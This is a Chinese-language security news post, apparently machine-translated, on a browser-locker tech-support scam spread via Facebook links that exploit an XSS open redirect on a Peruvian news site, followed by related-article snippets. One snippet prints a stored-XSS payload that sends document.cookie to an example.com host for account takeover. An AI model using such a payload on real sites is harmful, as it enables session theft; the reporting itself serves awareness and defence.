Browser Locker 重定向攻击利用新闻网站上 XSS 漏洞攻击 Facebook

Andrew2020-10-23 10:36:30

Facebook,新闻和XSS支持复杂的浏览器更衣柜攻击

精心设计的重定向和数百个URL构成了范围广泛的技术支持骗局。

复杂的“浏览器Locker”活动正在Facebook上传播,最终推动了技术支持骗局。研究人员说,这项工作比大多数工作都要先进,因为它涉及利用流行新闻网站上的跨站点脚本(XSS)漏洞。

浏览器Locker 是一种重定向攻击,网络冲浪者将在该站点上单击,然后仅发送到页面,警告他们计算机感染了“病毒”或恶意软件。然后,该页面通常会敦促目标用户在屏幕上拨打电话以获取“技术支持帮助”。如果他们不满意,他们会连接到呼叫中心,在呼叫中心,他们需要付费以“clean”他们的机器。

据研究人员称,在最近的一项广泛活动中,网络攻击者正在使用Facebook分发恶意链接,这些链接最终会重定向到浏览器更衣页。Malwarebytes的研究人员在周三概述其发现的帖子中指出,这些链接可能通过Facebook游戏传播。

Malwarebytes研究员JérômeSegura表示:“我们查看的广告活动似乎仅使用Facebook上发布的链接,考虑到传统上技术支持骗局是通过恶意广告传播的,因此这是非常不寻常的,”

他补充说,Facebook向用户发布了一个弹出窗口,要求他们确认重定向。但是,由于链接的URL地址略短,因此目的地被遮住了。

Segura说,总体而言,该公司在三个月的时间内发现了50个不同的bit.ly链接用于该骗局,“建议定期进行轮换以避免将其列入黑名单。”

XSS漏洞

Segura说,这些bit.ly URL重定向到一个名为RPP的Peruvian网站,该网站“完全合法,每月吸引2300万访问量”。他补充说,他已向Grupo RPP报告了此问题,但在发布时尚未得到回复。

他发现该站点包含一个XSS漏洞,该漏洞允许进行开放重定向。当HTTP GET请求中的参数值(URL中“?”之后的部分)允许将用户重定向到新网站的信息时,无需进行任何目标或合法目的的验证,就会发生开放重定向。因此,攻击者可以操纵该参数将受害者发送到虚假页面,但是该操作似乎是网站意图的合法操作。

活动的重定向流

研究人员说:“威胁演员喜欢滥用开放重定向,因为它使发送受害者的URL具有合法性。”

在这种情况下,威胁行动者正在使用XSS错误从buddhosi [.] com(受攻击者控制的恶意域)加载外部JavaScript代码,该网站将URL中的代码替换为重定向来创建重定向。

根据分析,“ JavaScript依次使用replace()方法创建了到Browlock登录页面的重定向。” 方法的作用是:在字符串中搜索指定值,然后返回替换指定值的新字符串。

Segura指出,除了将用户重定向到其他站点之外,攻击者还可以利用XSS将当前页面重写为他们喜欢的任何内容。

无论如何,最终的浏览器锁登录页面托管在大约500个“一次性”和随机命名的域名中,这些域名使用各种新的顶级域名(如.casa、.site、.space、.Club、.icu或.bar)。

Browser Locker

用户进入浏览器锁定器页面后,便会为用户的浏览器添加指纹,以显示适合上下文的消息。

Segura指出:“它显示了模仿当前系统文件扫描的动画,并威胁要在五分钟后删除硬盘驱动器。” “当然这都是假的,但令人信服的是,有人会拨打免费电话寻求帮助。”

电话号码,就像页面本身一样,也很多。恶意软件字节找到了近40个不同的电话号码,并指出可能还会更多。

总而言之,事件链非常复杂且范围广泛,足以帮助威胁行为者避免被关闭。Segura说,Facebook的角度也很精明。

一如既往,针对这些类型的骗局的最佳防御方法就是简单地认知。

作为起点,“发布到社交媒体平台上的链接应始终受到审查,因为它们是骗子和恶意软件作者将用户重定向到不良内容上的普遍滥用方式,”他指出。

重定向xss
本作品采用《CC 协议》,转载必须注明作者和本文链接
软件漏洞分析简述
2022-07-18 07:08:06
然后电脑坏了,借了一台win11的,凑合着用吧。第一处我们直接看一下他写的waf. 逻辑比较简单,利用正则,所有通过 GET 传参得到的参数经过verify_str函数调用inject_check_sql函数进行参数检查过滤,如果匹配黑名单,就退出。但是又有test_input函数进行限制。可以看到$web_urls会被放入数据库语句执行,由于$web_urls获取没有经过过滤函数,所以可以
什么是开放重定向
2020-10-12 10:56:50
什么是重定向 当网站或Web应用程序更改客户端中访问的URL时,将发生重定向。如果合法网站根据用户提供的参数安全地构建重定向URL,则它是安全的重定向。如何防止打开重定向 防止开放重定向漏洞的最安全方法是在Web应用程序中不使用任何重定向。将其完整的URL存储在数据库表中,并使用标识符作为请求参数而不是URL本身来调用它们。确保检查部分字符串,例如,http:// * *.是有效的URL。此外,禁止使用除HTTP和HTTPS之外的所有协议。
精心设计的重定向和数百个URL构成了范围广泛的技术支持骗局。据研究人员称,在最近的一项广泛活动中,网络攻击者正在使用Facebook分发恶意链接,这些链接最终会重定向到浏览器更衣页。Malwarebytes的研究人员在周三概述其发现的帖子中指出,这些链接可能通过Facebook游戏传播。Segura说,总体而言,该公司在三个月的时间内发现了50个不同的链接用于该骗局,“建议定期进行轮换以避免将其列入黑名单。”他发现该站点包含一个XSS漏洞,该漏洞允许进行开放重定向
背景介绍在本文中,const 和 mrhavit 将分享他们发现跨站脚本漏洞的经验,该漏洞可能在多个 TikTok 应用程序中导致帐户接管。新的重定向 URL 包含一些参数,第一个参数是“status”,它负责页面内容,第二个参数是“link”,目前还不知道它会如何影响页面。当将“status”参数的值更改为“1”时,页面内容发生了变化,并出现了一个新按钮。
2022年1月18日,360漏洞云团队监测到Apache Knox发布安全公告,修复了一个Apache Knox中的XSS漏洞。漏洞编号:CVE-2021-42357,漏洞威胁等级:中危。
国外白帽团队针对VPN组件进行研究,快速搜索得到了大约50,000个Citrix Gateway实例可公开访问,因此,即使是像跨站脚本这样的小问题也会产生潜在的巨大影响。在研究过程中,他们发现了一个开放的重定向漏洞,该漏洞无需身份验证即可被利用,如果Citrix Gateway部署在这样的配置中,甚至还能将其转移到CRLF注入中,从而导致XSS或潜在的缓存中毒。在这篇文章之前,他们对一百个Citrix Gateway实例进行了快速扫描,发现仍有超过一半的实例未修补。(一个类似于FreeBSD的实用程序?
开放重定向,也叫URL跳转漏洞,是指服务端未对传入的跳转url变量进行检查和控制,导致诱导用户跳转到恶意网站,由于是从可信的站点跳转出去的,用户会比较信任。渗透测试中的 URL 重定向常见的 URL 重定向漏洞都比较明显,但是也有少数例外,这里总结了三种常见的 URL重定向类型。returnUrl=/dashboard登录之后会跳转至 /dashboard,并且是以登录后的身份,这时我们可以测试是否会跳转目标以外的网站,比如:https://example.com/login?
Opera浏览器有一个功能是My Flow,作用是计算机和手机之间的进行图片、视频、文件等共享。要连接到手机,只需扫描二维码,然后就可以在设备之间发送东西。
我发现了一个存储的XSS漏洞,我可以通过窃取cookie升级为帐户接管。我的payload目前需要最少的用户交互,只需单击即可。之后,向下滚动并单击取消预约。确保您拦截了此请求。使用以下有效载荷添加消息:"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">您通常会收到一个确认框,确认您的预约已取消,单击确定。即使管理员注销,此cookie也可以轻松重用。这是因为cookie不会过期。影响我能够通过取消我们的预约并包含一条消息来接管一个管理员帐户。这意味着我们必须找到一个具有用户交互的。
XSS到RCE,终获8000美刀奖励~
Andrew
暂无描述